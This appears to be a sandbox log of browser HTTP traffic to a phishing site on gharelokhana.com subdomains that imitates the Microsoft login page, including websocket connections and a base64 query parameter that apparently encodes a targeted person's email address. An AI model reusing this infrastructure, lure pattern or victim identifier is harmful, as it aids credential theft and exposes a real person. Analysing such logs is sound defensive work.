            Source: global trafficHTTP traffic detected: GET /?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A HTTP/1.1Host: djdjkdlellekkff.gharelokhana.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://alvoradavisual.com.br/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /4.5.1/npm-monitoring HTTP/1.1Host: djdjkdlellekkff.gharelokhana.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://djdjkdlellekkff.gharelokhana.com/?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9AAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /4.5.1/npm-monitoring HTTP/1.1Host: djdjkdlellekkff.gharelokhana.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A HTTP/1.1Host: djdjkdlellekkff.gharelokhana.comConnection: keep-aliveCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://djdjkdlellekkff.gharelokhana.com/?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9AAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: zQt4SK="M2M0MTI1Y2EtMWNlMi00OWFlLWE4YjQtMjVlODU1NWEzMmUyOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/js/BssoInterrupt_Core_zKox_QMcTIVut7mG_Z9Eew2.js HTTP/1.1Host: 707242bf-3c4125ca.gharelokhana.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://djdjkdlellekkff.gharelokhana.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://djdjkdlellekkff.gharelokhana.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /3c4125ca1ce249aea8b425e8555a32e2/ HTTP/1.1Host: djdjkdlellekkff.gharelokhana.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://djdjkdlellekkff.gharelokhana.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: zQt4SK="M2M0MTI1Y2EtMWNlMi00OWFlLWE4YjQtMjVlODU1NWEzMmUyOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="Sec-WebSocket-Key: nkKeI43bRauZvPLRMgt+4g==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
            Source: global trafficHTTP traffic detected: GET /?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A&sso_reload=true HTTP/1.1Host: djdjkdlellekkff.gharelokhana.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://djdjkdlellekkff.gharelokhana.com/?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9AAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: zQt4SK="M2M0MTI1Y2EtMWNlMi00OWFlLWE4YjQtMjVlODU1NWEzMmUyOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: djdjkdlellekkff.gharelokhana.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://djdjkdlellekkff.gharelokhana.com/?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9AAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: zQt4SK="M2M0MTI1Y2EtMWNlMi00OWFlLWE4YjQtMjVlODU1NWEzMmUyOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1
            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/js/BssoInterrupt_Core_zKox_QMcTIVut7mG_Z9Eew2.js HTTP/1.1Host: 707242bf-3c4125ca.gharelokhana.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: zQt4SK="M2M0MTI1Y2EtMWNlMi00OWFlLWE4YjQtMjVlODU1NWEzMmUyOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
            Source: global trafficHTTP traffic detected: GET /ests/2.1/content/cdnbundles/converged.v2.login.min_81imvbluez-v5hbzpkxfcg2.css HTTP/1.1Host: 33767741-3c4125ca.gharelokhana.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://djdjkdlellekkff.gharelokhana.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://djdjkdlellekkff.gharelokhana.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/js/ConvergedLogin_PCore_i5YupurhQAo9inu_OetqHw2.js HTTP/1.1Host: 33767741-3c4125ca.gharelokhana.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://djdjkdlellekkff.gharelokhana.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://djdjkdlellekkff.gharelokhana.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /ests/2.1/content/cdnbundles/ux.converged.login.strings-en.min_i8f-75gfk3tbsm8bmatnqa2.js HTTP/1.1Host: 33767741-3c4125ca.gharelokhana.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://djdjkdlellekkff.gharelokhana.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://djdjkdlellekkff.gharelokhana.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /ests/2.1/content/cdnbundles/ux.converged.login.strings-en.min_i8f-75gfk3tbsm8bmatnqa2.js HTTP/1.1Host: 33767741-3c4125ca.gharelokhana.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: zQt4SK="M2M0MTI1Y2EtMWNlMi00OWFlLWE4YjQtMjVlODU1NWEzMmUyOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
            Source: global trafficHTTP traffic detected: GET /Me.htm?v=3 HTTP/1.1Host: l1ve.gharelokhana.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Purpose: prefetchSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://djdjkdlellekkff.gharelokhana.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: zQt4SK="M2M0MTI1Y2EtMWNlMi00OWFlLWE4YjQtMjVlODU1NWEzMmUyOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js HTTP/1.1Host: 33767741-3c4125ca.gharelokhana.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://djdjkdlellekkff.gharelokhana.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: zQt4SK="M2M0MTI1Y2EtMWNlMi00OWFlLWE4YjQtMjVlODU1NWEzMmUyOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/js/ConvergedLogin_PCore_i5YupurhQAo9inu_OetqHw2.js HTTP/1.1Host: 33767741-3c4125ca.gharelokhana.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: zQt4SK="M2M0MTI1Y2EtMWNlMi00OWFlLWE4YjQtMjVlODU1NWEzMmUyOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
            Source: global trafficHTTP traffic detected: GET /3c4125ca1ce249aea8b425e8555a32e2/ HTTP/1.1Host: djdjkdlellekkff.gharelokhana.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://djdjkdlellekkff.gharelokhana.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: zQt4SK="M2M0MTI1Y2EtMWNlMi00OWFlLWE4YjQtMjVlODU1NWEzMmUyOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1Sec-WebSocket-Key: 3ffqw7RFxef0UvlWUSHDXg==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js HTTP/1.1Host: 33767741-3c4125ca.gharelokhana.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: zQt4SK="M2M0MTI1Y2EtMWNlMi00OWFlLWE4YjQtMjVlODU1NWEzMmUyOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/js/asyncchunk/convergedlogin_pcustomizationloader_117b650bccea354984d8.js HTTP/1.1Host: 33767741-3c4125ca.gharelokhana.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://djdjkdlellekkff.gharelokhana.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: zQt4SK="M2M0MTI1Y2EtMWNlMi00OWFlLWE4YjQtMjVlODU1NWEzMmUyOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
            Source: global trafficHTTP traffic detected: GET /Prefetch/Prefetch.aspx HTTP/1.1Host: c65af2e9-3c4125ca.gharelokhana.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://djdjkdlellekkff.gharelokhana.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: zQt4SK="M2M0MTI1Y2EtMWNlMi00OWFlLWE4YjQtMjVlODU1NWEzMmUyOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
            Source: global trafficHTTP traffic detected: GET /3c4125ca1ce249aea8b425e8555a32e2/ HTTP/1.1Host: djdjkdlellekkff.gharelokhana.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://djdjkdlellekkff.gharelokhana.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: zQt4SK="M2M0MTI1Y2EtMWNlMi00OWFlLWE4YjQtMjVlODU1NWEzMmUyOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; MicrosoftApplicationsTelemetryDeviceId=705de295-27a1-4bd9-946b-6b8b666c8137; brcap=0Sec-WebSocket-Key: iX3aSFpSrljZs2BWTlCVsw==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/js/asyncchunk/convergedlogin_pfetchsessionsprogress_d0a803279e7397bef834.js HTTP/1.1Host: 33767741-3c4125ca.gharelokhana.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://djdjkdlellekkff.gharelokhana.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: zQt4SK="M2M0MTI1Y2EtMWNlMi00OWFlLWE4YjQtMjVlODU1NWEzMmUyOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/marching_ants_white_8257b0707cbe1d0bd2661b80068676fe.gif HTTP/1.1Host: 33767741-3c4125ca.gharelokhana.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://djdjkdlellekkff.gharelokhana.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: zQt4SK="M2M0MTI1Y2EtMWNlMi00OWFlLWE4YjQtMjVlODU1NWEzMmUyOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/js/asyncchunk/convergedlogin_pcustomizationloader_117b650bccea354984d8.js HTTP/1.1Host: 33767741-3c4125ca.gharelokhana.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: zQt4SK="M2M0MTI1Y2EtMWNlMi00OWFlLWE4YjQtMjVlODU1NWEzMmUyOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/marching_ants_986f40b5a9dc7d39ef8396797f61b323.gif HTTP/1.1Host: 33767741-3c4125ca.gharelokhana.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://djdjkdlellekkff.gharelokhana.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: zQt4SK="M2M0MTI1Y2EtMWNlMi00OWFlLWE4YjQtMjVlODU1NWEzMmUyOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/marching_ants_986f40b5a9dc7d39ef8396797f61b323.gif HTTP/1.1Host: 33767741-3c4125ca.gharelokhana.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: zQt4SK="M2M0MTI1Y2EtMWNlMi00OWFlLWE4YjQtMjVlODU1NWEzMmUyOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico HTTP/1.1Host: 33767741-3c4125ca.gharelokhana.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://djdjkdlellekkff.gharelokhana.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: zQt4SK="M2M0MTI1Y2EtMWNlMi00OWFlLWE4YjQtMjVlODU1NWEzMmUyOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/js/asyncchunk/convergedlogin_pfetchsessionsprogress_d0a803279e7397bef834.js HTTP/1.1Host: 33767741-3c4125ca.gharelokhana.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: zQt4SK="M2M0MTI1Y2EtMWNlMi00OWFlLWE4YjQtMjVlODU1NWEzMmUyOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg HTTP/1.1Host: 33767741-3c4125ca.gharelokhana.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://djdjkdlellekkff.gharelokhana.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: zQt4SK="M2M0MTI1Y2EtMWNlMi00OWFlLWE4YjQtMjVlODU1NWEzMmUyOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1Host: 33767741-3c4125ca.gharelokhana.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://djdjkdlellekkff.gharelokhana.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: zQt4SK="M2M0MTI1Y2EtMWNlMi00OWFlLWE4YjQtMjVlODU1NWEzMmUyOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/marching_ants_white_8257b0707cbe1d0bd2661b80068676fe.gif HTTP/1.1Host: 33767741-3c4125ca.gharelokhana.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: zQt4SK="M2M0MTI1Y2EtMWNlMi00OWFlLWE4YjQtMjVlODU1NWEzMmUyOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
